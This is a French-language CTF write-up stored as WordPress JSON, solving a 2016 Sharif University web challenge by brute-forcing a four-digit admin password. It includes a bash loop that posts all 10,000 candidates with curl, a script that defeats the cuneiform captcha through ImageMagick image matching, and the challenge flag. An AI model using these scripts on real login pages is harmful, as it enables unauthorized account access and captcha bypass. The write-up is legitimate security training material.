{"id":1817,"date":"2016-02-07T01:58:46","date_gmt":"2016-02-07T00:58:46","guid":{"rendered":"https:\/\/0x90r00t.com\/?p=1817"},"modified":"2016-02-07T14:49:46","modified_gmt":"2016-02-07T13:49:46","slug":"sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up","status":"publish","type":"post","link":"https:\/\/0x90r00t.com\/fr\/2016\/02\/07\/sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up\/","title":{"rendered":"[Sharif University CTF 2016] [Web 250 \u2013 Old persian cuneiform captcha] Write Up"},"content":{"rendered":"<blockquote>\n<h2>Description<\/h2>\n<p>Old Persian cuneiform is a semi-alphabetic cuneiform script that was the primary script for the old persian language. You could get more information on following links,<br \/>\n1- http:\/\/www.ancientscripts.com\/oldpersian.html<br \/>\n2- https:\/\/en.wikipedia.org\/wiki\/Old_Persian_cuneiform.A web-based collections management for a museum has some extremely valuable information if one has admin user access.<\/p>\n<p><a href=\"http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/\">The Site<\/a><\/p>\n<p>We found that the \u00ab\u00a0admin\u00a0\u00bb user have a 4-digit password. But they use a captcha made of 10 old persian characters. One has to use the correspondence between symbols and strings to pass theye captcha verification (use \u00ab\u00a0trans.png\u00a0\u00bb).<br \/>\nLog in as \u00ab\u00a0admin\u00a0\u00bb to find the flag.<br \/>\nthe flag is in the fomat: [Your flag is: flagflagflag&#8230;] (without braces)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-1819\" src=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-1024x107.png\" alt=\"trans\" width=\"474\" height=\"50\" srcset=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-1024x107.png 1024w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-300x31.png 300w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans-768x80.png 768w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/trans.png 1876w\" sizes=\"auto, (max-width: 474px) 100vw, 474px\" \/><\/p><\/blockquote>\n<p><!--more--><\/p>\n<h2>Resolution<\/h2>\n<p>Nous somme face \u00e0 un challenge vraiment tr\u00e8s simple, un bruteforce sur quatre chiffres \ud83d\ude42<br \/>\nHeureusement qu&rsquo;ils ont pens\u00e9s \u00e0 rajouter un captcha.<\/p>\n<p>Commencons par le code du bruteforce, apr\u00e8s quelques tests, les messages d&rsquo;erreurs sont \u00ab\u00a0Login failed\u00a0\u00bb pour une erreur dans le mot de passe, et \u00ab\u00a0Invalid captcha\u00a0\u00bb pour une erreur dans le captcha.<\/p>\n<p>Nous codons une petite boucle en bash, qui va tester les 10000 mots de passes possibles.<br \/>\nLa valeur du captcha est quant \u00e0 elle r\u00e9cup\u00e9r\u00e9e par un second script.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n#!\/bin\/bash\r\n\r\nfor passwd in {0000..9999}\r\ndo\r\n  caperror=1\r\n  while &#x5B; $caperror == 1 ]\r\n  do\r\n    rm -f *.jpg\r\n    captcha=$(.\/captcha.sh)\r\n    res=$(curl --retry 1000000 --connect-timeout 1 -s -L -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 --data &quot;username=admin&amp;password=$passwd&amp;captcha=$captcha&quot; &quot;http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/login\/submit\/&quot;)\r\n    echo $res | grep -q &quot;Invalid captcha&quot; || caperror=0\r\n  done\r\n  echo $res | grep -q &quot;Login failed&quot; || echo $passwd : $res\r\n  echo test : $passwd\r\ndone\r\n<\/pre>\n<p>Passons maintenant au script de r\u00e9cup\u00e9ration du captcha, pour cela nous avons mis dans le r\u00e9pertoire conv une image pour chaque lettre.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1820\" src=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv-300x198.png\" alt=\"conv\" width=\"300\" height=\"198\" srcset=\"https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv-300x198.png 300w, https:\/\/0x90r00t.com\/wp-content\/uploads\/2016\/02\/conv.png 598w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/p>\n<p>Ensuite nous utilisons le programme compare de la suite ImageMagick, avec le metric phash.<br \/>\nCela retourne un nombre exprimant la diff\u00e9rence.<\/p>\n<p>Ex1 : Images diff\u00e9rentes.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\ncompare -metric phash 1-0.jpg conv\/A.jpg NULL: 2&gt;&amp;1\r\n6.76925\r\n<\/pre>\n<p>Ex2 : Images presque identiques.<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\ncompare -metric phash 1-0.jpg conv\/F.jpg NULL: 2&gt;&amp;1\r\n0.0121092\r\n<\/pre>\n<p>Et voici le script du captcha :<\/p>\n<pre class=\"brush: bash; title: ; notranslate\" title=\"\">\r\n\r\n#!\/bin\/bash\r\ncurl --retry 1000000 --connect-timeout 1 -b PHPSESSID=515386866780b5f132fc96c02b3ddb82 -s &quot;http:\/\/ctf.sharif.edu:32455\/chal\/oldpersian\/04b2dfb564086721\/captcha\/&quot; &gt; 1.jpg\r\nmogrify -crop 80x80 +repage 1.jpg\r\n\r\nls *.jpg | while read char\r\ndo\r\n  ls conv\/ | while read char_conv; do compare -metric phash $char conv\/$char_conv NULL: 2&gt;&amp;1 | grep -qE &quot;^0.&#x5B;0-9]*&quot; &amp;&amp; { echo -n $char_conv | sed 's\/.jpg\/\/'; break; }; done\r\ndone\r\n<\/pre>\n<p>Il ne nous reste plus qu&rsquo;a lancer le script de bruteforce, et &#8230; passer \u00e0 autre chose.<\/p>\n<pre class=\"brush: plain; light: true; title: ; notranslate\" title=\"\">\r\n\r\ntest : 0000\r\ntest : 0001\r\n...\r\ntest : 7473\r\ntest : 7474\r\ntest : 7475\r\n7476 : Your flag is: 1a5bfab77002fc17e996ef292199885b\r\n\r\n<\/pre>\n<p>Le flag de validation est : 1a5bfab77002fc17e996ef292199885b<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Description Old Persian cuneiform is a semi-alphabetic cuneiform script that was the primary script for the old persian language. You could get more information on following links, 1- http:\/\/www.ancientscripts.com\/oldpersian.html 2- https:\/\/en.wikipedia.org\/wiki\/Old_Persian_cuneiform.A web-based collections management for a museum has some extremely valuable information if one has admin user access. The Site We found that the \u00ab\u00a0admin\u00a0\u00bb &hellip; <a href=\"https:\/\/0x90r00t.com\/fr\/2016\/02\/07\/sharif-university-ctf-2016-web-250-old-persian-cuneiform-captcha-write-up\/\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">[Sharif University CTF 2016] [Web 250 \u2013 Old persian cuneiform captcha] Write Up<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[130,35,135],"tags":[128,134,38,133,19],"class_list":["post-1817","post","type-post","status-publish","format-standard","hentry","category-2016-fr","category-ctf-fr","category-sharif-fr","tag-2016-fr","tag-captcha","tag-ctf-fr","tag-sharif","tag-web"],"_links":{"self":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/comments?post=1817"}],"version-history":[{"count":24,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817\/revisions"}],"predecessor-version":[{"id":1879,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/posts\/1817\/revisions\/1879"}],"wp:attachment":[{"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/media?parent=1817"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/categories?post=1817"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/0x90r00t.com\/fr\/wp-json\/wp\/v2\/tags?post=1817"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}